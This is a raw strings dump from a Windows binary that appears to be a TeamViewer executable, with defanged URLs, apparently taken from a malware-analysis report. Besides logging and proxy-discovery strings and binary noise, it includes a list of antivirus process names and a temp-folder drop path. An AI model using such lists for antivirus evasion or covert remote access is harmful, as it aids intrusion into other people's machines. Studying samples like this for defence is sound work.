.?AV?$bind_t@XV?$mf5@XVSecureNetworkConnection@tvencrypt@@ABV?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@ABV?$function@$$A6AXABVptime@posix_time@boost@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@3@@Z@4@ABUCertificateData@2@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@4@ABVCertificate@2@@_mfi@boost@@V?$list6@V?$value@V?$shared_ptr@VSecureNetworkConnection@tvencrypt@@@boost@@@_bi@boost@@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@23@V?$value@V?$function@$$A6AXABVptime@posix_time@boost@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@3@@Z@boost@@@23@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf4@XVSecureNetworkConnection@tvencrypt@@IIIAAUTContent@CRCmdAck@tvhelper@@@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VSecureNetworkConnection@tvencrypt@@@boost@@@_bi@boost@@V?$value@I@23@V423@V423@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf4@XVSecureNetworkConnection@tvencrypt@@ABV?$function@$$A6AXABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@@Z@boost@@ABUCertificateData@2@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@4@ABVCertificate@2@@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VSecureNetworkConnection@tvencrypt@@@boost@@@_bi@boost@@V?$value@V?$function@$$A6AXABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@@Z@boost@@@23@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVPrintingDataAcceptorTCP@tvprint@@ABV?$shared_ptr@V?$basic_streambuf@V?$allocator@D@std@@@asio@boost@@@boost@@ABV34@I@_mfi@boost@@V?$list4@V?$value@V?$shared_ptr@VPrintingDataAcceptorTCP@tvprint@@@boost@@@_bi@boost@@V?$value@V?$shared_ptr@V?$basic_streambuf@V?$allocator@D@std@@@asio@boost@@@boost@@@23@V423@V?$value@I@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf0@XVPrintingDataAcceptorTCP@tvprint@@@_mfi@boost@@V?$list1@U?$arg@$00@boost@@@_bi@3@@_bi@boost@@
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="x86" name="TeamViewer.exe" type="win32"></assemblyIdentity><description>TeamViewer</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><asmv2:trustInfo xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns="urn:schemas-microsoft-com:asm.v3"><asmv2:security><asmv2:requestedPrivileges><asmv2:requestedExecutionLevel level="asInvoker" uiAccess="false"></asmv2:requestedExecutionLevel></asmv2:requestedPrivileges></asmv2:security></asmv2:trustInfo><asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings"><dpiAware>true</dpiAware></asmv3:windowsSettings></asmv3:application><compat:compatibility xmlns:compat="urn:schemas-microsoft-com:compatibility.v1"><compat:application><compat:supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></compat:supportedOS><compat:supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></compat:supportedOS><compat:supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></compat:supportedOS><compat:supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></compat:supportedOS><compat:supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></compat:supportedOS></compat:application></compat:compatibility></assembly>6d6F7S7d7
092`6{8 ;4-4h4E5T5j5}5
0!040)1<142
1-1(2.252
6o6
4"4'42494
1,2i2r2x2~2
=!>1>`>|>
9!:&:.:~:
4%4x4
7"7)70777
4!4:4^4}4
5#5'5 5/535:5
5%5x5'696v6
01
>%>,>6>@>
3(34393~3
8'9/9):1:9:
9!:':.:4:~:
2'2D2V2\2g2m2z2
2=3w3|3
:!;/;`;{;77
3#4;4[4P5
:":.:4:{:0Z0r0
3!3 31373
8”9C9
1)10171'2`2
= =@=]=&>
6%7X7
4%4-434?4"5
8%8S8
9 :3:8:?:
3$3*30363?3
6&9 92979
2-3e3k3}3
?"?&?*?5?
="=&=*=.=2=6=<=[=~=
1&20292|2
2-2N2d2e4{4= =$=(=,=0=4=8=
4_5
101<1$232@2
3,4<4`4}4
5!6 606`6
7#7(72777
5(5-5;5@5
5 5$5(5,5054585<5
6:6`6~=,>
6-7}7
11g1v1
365=5$666
3%3U365y5
3 3$3(3,3034383<3@3
1#2.232?2
6(74797}7
9”9d9z9
9": :3:>:
21262 373
30>0^2|2
1F3N3]5e5
8’9:9?9
1%2S2k2
3L4J4P5W5
8%8-828}8
264)5:5]5
3-343k3p3}3
2-2\2d2l2
4#4'4 4/43474;4?4
4*464$6=6
8&959@9$:
595_506?6
9 :$:(:,:0:
8 8$8(8,8084888<8@8
1#1*11181?1
7&7,72787>7
,2024282
&18123&484
#020?0]0
2%3U3
5%5s5
=!=(=/=6===
9 9$9(9,90949~9
94:>:`:{:5"5-585@5
5"5&5*5.52565:5
6e6S6
1 1$1(1/1
5*5[5|5|6
7&727^7|7
;!;';/;5;=;
080[0~0!1
7%8X8
343C3R3a3p3
4D4C4R4a4p4
< <$<(<,<0<4<
: :$:(:,:
2 2$2(2,2024282
1 1$1(1,10141
2 2$2(2,202
0$0(0,0004080
4 4$4(4,4044484<4
< <$<(<,<
8 8$8(8,808
; ;$;(;,;
1 1$1(1,101
3 3$3(3,3
7 7$7(7,7074787<7@7
>$?(?,?0?4?8?
$7(7,7074787
0 1$1(1,101|2
1 1$1(1,1014181
7 7$7(7,7074787<7
9 9$9(9,909
6 6$6(6,606
= =$=(=,=0=4=8=<=@=
7$7(7,70747
7 8$8(8,80848
8 8$8(8,8084888
2 2$2(2,2024282<2
7 7$7(7$;(;,;0;4;
4 4$4(4,40444
6 6$6(6,6064686<6
< <$<(<,<0<4<8<
;0<4<8<<<@<
5 5$5(5,50545
3 3$3(3|:
:,<0<4<8<<<@<
> >$>(>,>0>4>8>
0 0$0(0,0004080<0@0
>,>8>@>`>|>
0,080@0`0|0
8,888@8`8|8
6,686@6`6|6
6 6(646\6
9 9$9(9,90989
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
n.cmd
ReceivedTelephoneConferenceCommand, could not parse TVCmdTelephoneConference_PhoneListTable:
client.CheckForLicenseUpdate
client.BuyLicense
OpenWebsiteHelper::OpenLicenseUpdateWebsite: Bad format in url string for license update website
KeyTooLarge
QuickSupport
VoIP: Shutting Pipe change sender status to %1% while is shut = %2%
VoIP: ShuttingPipe set to %1%
VoIP: using pipeline factory async = %1%
RA: Create RemoteAudioPipeline for ch = %1%
ConversionPipeline
MonoToStereoConvertProcessor unsuported input format
InstantSupportCase destroyed.
InstantSupportCase initialized.
InstantSupportCase::CreateNewSupportSessionInternal: Requesting dynamic instant support session (last session id was %1%)
InstantSupportCase::ReceivedDynamicInstantSupportSession: requesting the instant support session failed, exit TeamViewer
CMain::TryOpenTVInstanceGUI(): CreateLogin() failed!
InstantSupportCase::ConnectToSupportSession was called in non-Instant-Support case.
InstantSupportCase::SendSupportData() AccountAction: commiting data
InstantSupportCase::LogIntoCustomAccount() Login triggered.
InstantSupportCase::LogIntoCustomAccount() ResultCB: Cannot execute actions.
InstantSupportCase::LogOut() Logout triggered.
b105e379-01c2-427f-9978-1851c92313bb
CloudStorageKey
CloudStorageAccessManager: Error on load CloudStorage Key. ErrorCode: %1%
CloudStorageAccessManager: Error on load CloudStorage Key. Not a AccountStorageCommand.
CloudStorageAccessManager: CloudStorage Key loaded.
CloudStorageAccessManager: Invalid cloud storage key was loaded.
CloudStorageAccessManager: Error on store CloudStorage Key. ErrorCode: %1%
CloudStorageAccessManager: Error on store CloudStorage Key. Not a AccountStorageCommand.
CloudStorageAccessManager: Stored new CloudStorage Key.
CloudStorageAccessManager: A CloudStorage Key already exists. Load the existing key.
CloudStorageAccessManager: Error on load the existing key. Can not use AccountStorageProvider.
CloudStorageAccessManager: Error from AccountStorageProvider at store key. Reason: %1%
CloudStorageFileDownload: Download(%1%) was not success with HttpRequestStatus(%2%) and ResponseCode(%3%)
TVCmdUpdate_DataCached - not found in cache: %1%
TV_HiddenWebBrowserWindowPreventingJScriptUnloadingWin
AudioCodec: Codec %1% not supported by this client version
AudioCodec: Codec %1% not supported
RA: Set opus codec quality to %1% which is not supported (using %2% per channel)
(in %s)
(#samples=%d)
#undefined=%s,
bin[%d]=%s,
#[%s,%s)=%s
Range %s DD:
#(-inf,%s)=%s
#[%s,inf)=%s
[%s,%s)
#(-inf,inf)=%s
(-inf,%s)
[%s,inf)
#%s=%s
#b%d=%s
#(-inf,%s]=%s
#below=%s
#above=%s
#all=%s
%s Quality: Gapless=%d, Ordered=%d
%sArrival sequence statistics: ---------------------
%s Stamp deltas: %s
%sArrivalcounts per 10 gets: %d
%sStamped arrival rate: %f
%sArrival rate: %f
%sArrival frequency statistics (#ticks=%d, #used-frames=%d): -----------------
%sLoss rate: %f
%s Streaming quality: gap-packets=%2.2lf%%, deleted-packets=%2.2lf%%, longest gap-train=%d, longest deletion-train=%d
%sJitter buffer box statistics (#gets=%d): -------------------
%s Gap-packets-count by gap-train length: %s
%s Interface results: is-shut=%2.2lf%%, original=%2.2lf%%, is-empty=%2.2lf%%, missing-next-available = %2.2lf%%, missing = %2.2lf%%, inserted=%2.2lf%%, is-rampingup=%2.2lf%%
%s Targetsize: (min/avg/max, stddev) = (%d / %2.2lf / %d, %2.2lf)
%s Deleted-packets-count by deletion-train length: %s
%s Buffered-window lengths: (min/avg/max, stddev) = (%d / %2.2lf / %d, %2.2lf)
%s Targetsizes: %s
%s Buffered-window lengths: %s
bufferedWindowSize
%See JitterBufferObserver::WriteResultValueMapping()
%s = %d;
ResultEmptyReasonStatusShut
%sJB ** buffer shrink: Removed %d old frames (each %fms) (target_size = %d frames, estim_size = %lf frames)
%sJitter buffer latencies: -----------------
%sJB ** missing frames: Simulated %d frames (each %fms) (target_size = %d frames, estim_size = %lf frames)
%s In-phase latency: %lf
%s Latencies: %s
%sJitterBuffer statistics block ( JBS ): -------------------
%sConsumption period statistics (#samples=%d): -----------------
%sJitterBuffer shut permanently!
JBS (%s):
%sSuggested target size: %d
%sFrame length: %f ms
%sStream info: Lossless=%d, Ordered=%d
%sJitter estimator %s (Latest stamp = %s)----------------------
%sAbsolute delays: %s
%sStamps: Gapless=%d, Increasing=%d, Deltas: %s
%sRelative lossless delays: %s
%sRelative delays: %s
%sJitter mode: %s
%sDelays for common jitter: %f
%sJitter: %f
%sDelay peaks: %s
.data
%sGet period in ms: %d
%sGet period in ms (averaged over 10 gets): %d
%sSenderStatusSwitcher: Discard %d packets in state closed with last packetID before close = %d. Expected %d packets.
%1%Filter %2% added
%sDistribution pipe:
%1%Filter %2% removed
%sSwitch OutputStreaming from %d to %d
%sAudioJitterBufferFilter:
%sReset by packet
AccountPictureCacheBase::DownloadPicture: Account: %1%, URL: %2%
AccountPictureUpload::BuddyCommandReceived: Received url change result for request %1%, success: %2%
AccountPictureUpload::UpdatePictureURLOnMaster: change url request id %1%, upload request %2%
AccountPictureUploadRequest::UpdatePictureURLOnMaster: Request: %1% interrupted. Logged-in account has changed. %2% -> %3%, session %4% -> %5%
AccountPictureUploadRequest::UpdatePictureURLOnMaster: Request: %1%, Account: %2%, new URL %3%
%1%user=%2%&token=%3%&tokenId=%4%&lng=%5%
&returnUrl=%/nav%/cc%/editbuddy%/%1%%/
&returnUrl=%/nav%/menu%/servicequeue%/
&returnUrl=%/nav%/it-brain%/alert-report%/scanid%/%1%
&returnUrl=%/nav%/it-brain%/policies%/
&returnUrl=%/nav%/buddies%/cac%/%1%%/edit%/
&returnUrl=%/nav%/it-brain%/alert-report%/threat%/%1%
InterProcess.ProcessControlCommand: proxy settings thread did not stop within 500 ms
SessionManagerClient::SessionChangeMode: no SessionID in bcmd - failed!
InterProcessGUI::Received_Control_ProxyPassword: Invalid expiration time: %1%
Received_Session_BandwidthReport exception parsing client capacities:
LoginClientConnect
CLoginClient::runClient(): AuthenticateClient failed
LoginClient::run: User denied automatic session recording, session will be terminated
CLoginClient::runClient(): Read failed
CLoginClient::NegotiateVersionClient socket was closed while reading
CLoginClient::NegotiateVersionClient expected TVCmdNegotiateVersion, received %1%
CLoginClient::NegotiateVersionClient()
CLoginClient::NegotiateVersionClient socket was closed while sending
CLoginClient::NegotiateVersionClient wrong version length
CLoginClient::NegotiateVersionClient negotiation of protocol version failed, server version string = %1%
CLoginClient::AuthenticateClient()
Login.AuthenticateClient: not authenticated
Login.AuthenticateClient: zero sized challenge parameter
Login.AuthenticateClient: terminated
Login.AuthenticateClient: Read failed
CLoginClient::AuthenticateClientShowMessageBox: Command is not of type TVCmdShowMessage
CLoginClient::AuthenticateClientShowMessageBox: couldn't show messagebox, no messagetext provided
Login.AuthenticateClient: target did not support nearby access
Login.AuthenticateClient: expected TVCmdAuthenticate, received %1%
WrongPassword
CLoginClient::DisplayConnectErrorMessage()
NoControlSupport
UnknownSupportSessionID
InvalidSupporterID
Login.AuthenticateClient: blacklisted
Login.AuthenticateClient: buddy account verification failed
Login.AuthenticateClient: NoIncomingOrBlocked
Login.AuthenticateClient: LAN connections disabled
CLogin::AuthenticateClient() Connection to %1% denied, because remote version is incompatible
CLogin::AuthenticateClient() Connection to %1% denied, because there was running a hosted meeting
Login.AuthenticateClient: smart access rejected
CLogin::AuthenticateClient() Connection to %1% denied, because remote TeamViewer is not visible
CLogin::AuthenticateClient() Connection to %1% denied, because license not available
Login.AuthenticateClient: connection rejected due to access control limitations
CLogin::AuthenticateClient() Connection to %1% denied, because %2% is not supported
CLogin::AuthenticateClient() Connection to %1% denied, because remote TeamViewer
%sSwitch OutputStreaming to %d
%sFusionPipe:
%sStopThreads
%sEnded
%sThreadPool:
%sStopped
%1%SetSinkState %2%
%1%current-size = %2%ms, target-size = %3%ms
%1%SetupAudioBuffer stop buffer %2%
%1%SetupAudioBuffer start buffer %2%
%sPlayback buffer:
%1%Shrink buffer to size %2%
RequestInstantSupportSessionForCQSLogic::Step0_QueryGroupInfo: Requesting group info for group '%1%'
RequestInstantSupportSessionForCQSLogic::Step0_QueryGroupInfo: CBuddyClientSend::RequestGroupInfoForGroupName failed
RequestInstantSupportSessionForCQSLogic::Step1_ReceivedGroupInfoForGroupName: no Groupkey and could not Set Groupkey
RequestInstantSupportSessionForCQSLogic::Step1_ReceivedGroupInfoForGroupName: CBuddyClientSend::RequestAddGroup failed
RequestInstantSupportSessionForCQSLogic::Step1_ReceivedGroupInfoForGroupName: Successfully received group info, group '%1%' has id %2%
RequestInstantSupportSessionForCQSLogic::Step1_ReceivedGroupInfoForGroupName: No group info received, group must be created
RequestInstantSupportSessionForCQSLogic::Step2_AddGroupReceived: failed to create group
RequestInstantSupportSessionForCQSLogic::Step3_QueryOrCreateInstantSupport: last session was '%1%', check if we can reuse it
RequestInstantSupportSessionForCQSLogic::Step2_AddGroupReceived: Group added with id %1%, now create session
RequestInstantSupportSessionForCQSLogic::Step2_AddGroupReceived: g_BuddyList->GetGroupByName return NULL, no group was created
RequestInstantSupportSessionForCQSLogic::Step3_QueryOrCreateInstantSupport: CBuddyClientSend::RequestCreateInstantSupport failed
RequestInstantSupportSessionForCQSLogic::Step4_QueryInstantSupportReceived: Session %1% is already expired
RequestInstantSupportSessionForCQSLogic::Step3_QueryOrCreateInstantSupport: CBuddyClientSend::QueryInstantSupport failed
RequestInstantSupportSessionForCQSLogic::Step3_QueryOrCreateInstantSupport: no last session provided (or reset during the process), creating new session
RequestInstantSupportSessionForCQSLogic::Step4_QueryInstantSupportReceived: CBuddyClientSend::RequestCreateInstantSupport failed
RequestInstantSupportSessionForCQSLogic::Step5_CreatedInstantSupportSessionReceived: Failed to create InstantSupport-Session, error %1% ('%2%')RequestInstantSupportSessionForCQSLogic::Step4_QueryInstantSupportReceived: Session %1% is already closed
RequestInstantSupportSessionForCQSLogic::Step4_QueryInstantSupportReceived: existing session not found
RequestInstantSupportSessionForCQSLogic::FinishSuccess: InstantSupport-Session %1% successfully requested
VoIP: NoiseGate: Energy samples: %s
%1%Set PlaybackState to %2%
VoIP: Receiver: VoiceReceiverAudioPipeline:
%sVoiceReceiverAudioPipeline RegisterPlaybackDataObserver
%sBuilding pipeline finished
%sVoIP: Receiver: Participant channel %s (%s):
%s VoIP: Receiver: Participant channel %s:
%sInitialize to version %s
%sInitialized
%sSetStatusStreamIsUsed %d
%sVoiceReceiverChannelPipeline:
%sWrong Codec parameters!
%sAdded to mixer
%sRemoved from mixer
%sSwitch actual playback status to %d
%sTerminate
%1%Channel created for participant %2% called %3%
%sInitThreadsAndPipeline
%1%StartTransmission for session %2%
%1%StopTransmission for session %2%
%sCould not retrieve existing sessions! Transmission broken!
%sFormat channel %s:
%sInitialzed
%sInitSenderImplementation done
%sStartTransmission
%sTerminate done
%sEnable transmission
%1%Session %2% removed
%1%Switch ActivityStatus to %2%
%1%Session %2% added
%1%Update active state us = %2%, ul = %3% to %4%
%sInit connection
%1%Set piping status to %2%
%sAdded to format channel
%sRemoved from format channel
VoIP: Sender: Session-format channel (%d, %s):
%sVoIP channel created for version %s
%sVoIP channel for version %s switched usage to %d
%sSession-format channel for %s built
%sVoIP channel for version %s has new subscriber
%sSession %d:
%sChannel manager:
"%s" %s
%1%created
%1%CheckSubscribeAudioData before pm is available
%1%Subscribe audio stream %2%
%sVoIPBCommandReceiver:
%1%Unsubscribe audio stream %2%
^\s*UDP(\W.*|$)
%1%Unable to register datastream (datastream id %2%), callback result %3%
%1%ControlStreamSubscribed with invalid control stream id, subscriber %2%
%1%Unable to register controlstream %2%, callback result %3%
%1%Stream registration failed with error %2%
%1ÚtaStreamSubscribed with invalid data stream id, subscriber %2%
%1%Changing V3 data stream subscription of %2% to %3%
%1%Changing V3 control stream subscription of %2% to %3%
%1%Changed V3 control stream subscription of %2% to %3%
%1%Changing %2% stream subscription of %3% to %4%
%1%Changing %2% stream usage to %3%
%1%Changed V3 data stream subscription of %2% to %3%
%1%Changing V1 stream subscription of %2% to %3%
%sVoIP streams:
%1%Close stream %2%
%s%s:
%1%Connection = %2%
%sVoIPV1BCommandSender:
%1%SetStatusStreamingIsActive(%2%)
%1%SendData, stream not available yet
%1%SendDataCommand on Stream %2% failed
%sVoIPV3BCommandSender:
%1%SendControlCommand %2% failed
%1%Send reset buffer due to audio processing lack sampleDistance=%2%
Initiating connection via .tvc file
CServerGUI::CreateSendFileServer: incoming remote support session could not be created!
GC.NewLicense.%1%
*.bmp;*.dib
*.jpg;*.jpeg;*.jpe;*.jfif;*.jif
*.gif
*.tif;*.tiff
*.png
CClientWindow::OnCreate(): Local display is %1%x%2%
/FilesSelected.cmd
/AuthenticationChanged.cmd
/GetAuthentications.cmd
/Logging.cmd
/Cancel.cmd
DragAndDropConnector::IncomingDndOperationStart: recvd dragcmd after mouse left
%d: 0xx
00:00:00
[ 1, 2, 3, 7, 8 ]
[ 2, 3, 5 ]
[ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 ]
[ 1, 2, 3, 8, 9 ]
TAF: Received answer is not valid. Request url: %1% - Answer: "%2%%3%"
CAdHelper::ListRequestThreadRun: Bad format in url string
TAF: Request url was %1%
hXXps://
uses an unsupported protocol.
about:executeminorupdate
about:executemajorupdate
about:loadurl
application/x-www-form-urlencoded
Unexpected TVCmdAskConfirmation
Client.Received_TVCommand TVCmdCombinedCommands
The partner does not support AccessControl.
The partner does not support AccessControl2.
%1%DirectSoundPushAudioBuffer[%2%] stop
%1%CreateSoundBuffer failed with error %2$x
%1%Unlock buffer failed with error %2$x
%1%DS notification missed, #ticks = %2%
%1%SetNotificationPositions failed with error %2$x
%1%Unlock buffer failed %2$x
%1%Could not restore Buffer. Error: %2$x
dsound.dll
%1% Get PKEY_AudioEndpoint_GUID failed 0x%2$x
%1%CLSIDFromString failed 0x%2$x
%sBuilding pipeline failed
%sDestroyed
%sVoice capturer used: VoiceCaptureDMO
%sVoice capturer used: Generic capturer
VoIP: Sender: VoiceSenderAudioPipeline:
%sBuilding pipeline started
%sStart
%sStop
TVCmdUpdate_DataCached - not found in cache!
unsupported connection mode
Server display is %1%x%2%x%3%, quali=%4%, monitors=%5%/%6%, sw=%7%, tilsize=%8%, scaling=%9%
shell32.dll
SendMail: LoadLibrary(MAPI32.DLL) failed with error %1%
mapi32.dll
SendMail: Could not Open Msg Store
SendMail: No Msg Store Tbl
SendMail.Send: MAPISendMail failed with error %1%
\message.eml
SupportUTF8
%Y-%m-%d_%H.%M.%S
Advapi32.dll
VideoWindowLocal::ReportAsyncInit(): Start camera stream!
VideoWindowLocal::StartVideoToPartnerForScb(): Partner doesn't support Video
BuddyChatProcessor.UpdateRecipientsDisplayName: getBuddy failed (accountID=%1% dyngateID=%2%)
CInvitePartnerToSession::ReceivedQuickJoinParticipantRequest: joining the remote control is not allowed because the sender has a paid license and the invitee only has a free license
CInvitePartnerToSession::ReceivedQuickJoinParticipantRequest: joining a meeting is not allowed because of access control restrictions
CInvitePartnerToSession::ReceivedQuickJoinParticipantRequest: joining the remote control is not allowed because of access control restrictions
CInvitePartnerToSession::HandleNearbyAccessInvitationResponse: received unexpected innerBCmd CC=%1% CT=%2%
ShowJoinRequestMsgBox: Join request was not displayed because the receiver was not verified. %1% %2%
CInvitePartnerToSession::ReceivedQuickJoinAnswer(): Unknown result!
CInvitePartnerToSession::ReceivedQuickJoinAnswer(): Received answer %1% from partner %2%.
CInvitePartnerToSession::ReceivedQuickJoinParticipantRequest: joining a video chat is not possible because there is already one running
CInvitePartnerToSession::ReceivedQuickJoinParticipantRequest: joining a meeting is not possible because of incompatible meeting versions
CInvitePartnerToSession::ReceivedQuickJoinParticipantRequest(): requestToken %1% not found in map.
CInvitePartnerToSession::ReceivedQuickJoinParticipantRequest(): Join meeting %1% without confirmation because requestToken was valid.
CInvitePartnerToSession::QuickJoinParticipantRequest::HandleTimeout(): Timeout reached for requestToken %1%
QuickJoinParticipantRequest::MessageBoxCallback(): Answered messagebox with %1% for meetingID %2%
CInvitePartnerToSession::ReceivedQuickJoinAnswer(): Received unknown requestID %1%
CProcessBuddyCQS::ReceiveBuddyCmd(): PartnerAccount is offline
CProcessBuddyCQS::ReceiveBuddyCmd(): Received answer for TemporaryPartnerForAccount request. AccountID=%1% SessionID=%2% PartnerBuddyID=%3%
CProcessBuddyCQS::ReceiveBuddyCmd(): Machine state of session %1% changed to %2%
CProcessBuddyCQS::ReceiveBuddyCmd(): PartnerAccount is online
RemoteSupport
TeamViewer.ini
disclaimer.txt
CHostedBrowserDialogWin::ShowDialogInternal: Size of buttons and callbacks do not correspond
CHostedBrowserDialogWin::ShowDialogInternal() has already been destroyed. URL=%1%
CHostedBrowserDialogWin::ShowDialogInternal: Create failed with error %1%
CHostedBrowserDialogWin::OnActionButton: Executed action on invalid button (%1%)
CHostedBrowserDialogWin::OnNavigateError(): URL: %1%
CHostedBrowserDialogWin::OnDocumentComplete(): currentUrl empty, callback
CHostedBrowserDialogWin::OnNavigateError(): URL is null
Failed to load resource DLL (TeamViewer_StaticRes.dll)!
SetProcessShutdownParameters failed
Failed to load resource DLL (TeamViewer_Resource.dll)!
RICHED20.DLL
123456789
Password
avgcsrvx.exe
avguard.exe
avfwsvc.exe
ccsvchst.exe
fsma32.exe
avp.exe
bdagent.exe
psimsvc.exe
nprosec.exe
tmbmsrv.exe
gdfwsvc.exe
npfsvc32.exe
CFirewallMsg
vsserv.exe
zlclient.exe
@@URL:QJ@@
@@URL:WEB@@
@@URL:FULL@@
@@URL:HOST@@
@@URL:QS@@
#### ### ###
@@URL:MID@@
CMainWindowQS::LoadCustomizationSettings: SRP information incomplete. Using dynamic password. ID: %1%, Verifier: %2%, Salt: %3%
CMainWindowQS::LoadCustomizationSettings: Using dynamic password
InitCustomDesignGUI(): security password strength invalid
CMainWindowQS::LoadCustomizationSettings: Using predefined password
CMainWindowQS::LoadCustomizationSettings: Skipping predefined password, AccountId: %1%
CMeetingScheduler::ProcessListMeeting: could not import meeting key:
CMeetingScheduler::ProcessListMeeting: no meetingkey attached
RA: try to convert unsuported number of channels (%1% to %2%)
audiosrv.dll
%1úiled to create device enumerator: %2$x
%sActivating AEC
%sActivating Gain Bounding
%sDeactivating Gain Bounding
%sDeactivating NS
%1%Changing AES iterations to %2%
%sActivating NS
%sDeactivating AEC
%sFailed to load mdmo.dll.
e%sFailed to load DMO functions.
msdmo.dll
e%1%SetOutputType failed: %2$x
%1úiled to create PropertyStore: %2$x
%1%GetDeviceIndex: Failed to get PKEY_AudioEndpoint_GUID: 0x%2$x %3%
%1úiled to create MediaObject: %2$x
%sUnsupported Format.
%sNo capture device availabe
%sCapture/Playback device disconnected.
%sfailed to set thread priority
%sbuffer full...
%1%FreeStreamingResources failed: %2$x
%sAEC quality: echoreduction = %0.1fdB, converged = %d
%sAEC on (quality undefined)
%sTerminated
%sno audio for %ld ms
%sNo playback device availabe
%sInvalid Argument. No playback device available.
%sPreampGainObserver not initialized
%sAEC off
%sVoiceCaptureDMO:
Printprocessor & Drivers installed, port install failed: Rollback
--port
127.0.0.1:5938
hXXps://VVV.teamviewer.com:443/
hXXp://VVV.teamviewer.com/
ProxyPasswordAES
ProxySearch: found opera HTTPS setting: %1%
ProxySearch.GetIEProxySettings: WinHttpGetIEProxyConfigForCurrentUser failed with error %1%
HTTPS server=
ProxySearch: found opera HTTP setting: %1%
\Opera\Opera\operaprefs.ini
HTTP server=
network.proxy.http_port
network.proxy.ssl
prefs.js
network.proxy.http
\Mozilla\Firefox\Profiles\
\Mozilla\Profiles\default\
ProxySearch: found auto config URL: %1%
ProxySearch.GetProxiesFromPAC: WinHttpGetProxyForUrl(WPAD) failed for URL '%1%' with error %2%
ProxySearch: found Mozilla HTTPS setting: %1%
ProxySearch.GetProxyAutoConfigSettings: WinHttpOpen failed with error %1%
network.proxy.ssl_port
ProxySearch: found Mozilla HTTP setting: %1%
https=
ProxySearch: found WinHTTP proxy: %1%
http=
ProxySearch.GetProxiesFromPAC: WinHttpGetProxyForUrl(URL) failed for URL '%1%' with error %2%
ProxySearch.GetWinHTTPSettings: WinHttpGetDefaultProxyConfiguration failed with error %1%
CScheduledMeeting::SetEncryptedPassword: Empty encrypted password: bad account or account V2 before meeting key!
CScheduledMeeting::SetEncryptedPassword: could not decrypt meeting password (might be old encryption)
CScheduledMeeting::GetEncryptedPassword: No encryption set for V2 account!
CScheduledMeeting::GetEncryptedPassword: could not encrypt meeting password:
CScheduledMeeting::SetEncryptedPassword(): account-password changed
CScheduledMeeting::SetEncryptedPassword(): Buffer too small!
CScheduledMeeting::SetEncryptedPassword(): password-length too big for buffer
CRestoreSession::RestoreConnection: Restoring InstantSupport-Session
RestoreSession: Failed to send RestoreSessionCmd
CCustomAxHostWindow::GetOverrideKeyPath: pchKey is null
CCustomAxHostWindow::Exec: Invoke of PropertyGet failed for property %s, errorcode x
CCustomAxHostWindow::Exec: GetIDsOfNames failed for property %s, errorcode x
errorUrl
CCustomAxHostWindow::Exec: Couldn't get ParentWindow of HTMLDocument, errorcode x
CCustomAxHostWindow::Exec: QueryInterface failed for HTMLDocument, errorcode x
CCustomAxHostWindow::Exec: Error-Line=%1%, Error-Char=%2%, Error-Code=%3%, Error-Message="%4%", Error-Url="%5%"
CCustomAxHostWindow::Exec: Couldn't get Event-Property of HTMLWindow, errorcode x
.tvlink
HotKey
CHttpRedirectionProtocol: CoInternetGetSession failed with 0xx
CHttpRedirectionProtocol: UrlMonLateBinding couldn't be initialized, needs at least IE7 to work
CHttpRedirectionProtocol: Successfully registered
CHttpRedirectionProtocol: RegisterNameSpace for https failed with 0xx
CHttpRedirectionProtocol: CreateInstance of HttpsHandlerFactory failed with 0xx (or returned NULL)
CHttpRedirectionProtocol: RegisterNameSpace for http failed with 0xx
CHttpRedirectionProtocol: CoInternetGetSession returned NULL pointer
CHttpRedirectionProtocol: CreateInstance of HttpHandlerFactory failed with 0xx (or returned NULL)
CHttpRedirectionProtocol: couldn't create Uri-Instance from '%s' (error 0xx)
CHttpRedirectionProtocol: GetAbsoluteUri failed with error 0xx
CHttpRedirectionProtocol: UnregisterNameSpace on https failed with 0xx
CHttpRedirectionProtocol: s_pHttpsHandlerFactory is unexpectedly NULL
CHttpRedirectionProtocol: s_pHttpHandlerFactory is unexpectedly NULL
CHttpRedirectionProtocol: https successfully unregistered
CHttpRedirectionProtocol: http successfully unregistered
CHttpRedirectionProtocol: UnregisterNameSpace on http failed with 0xx
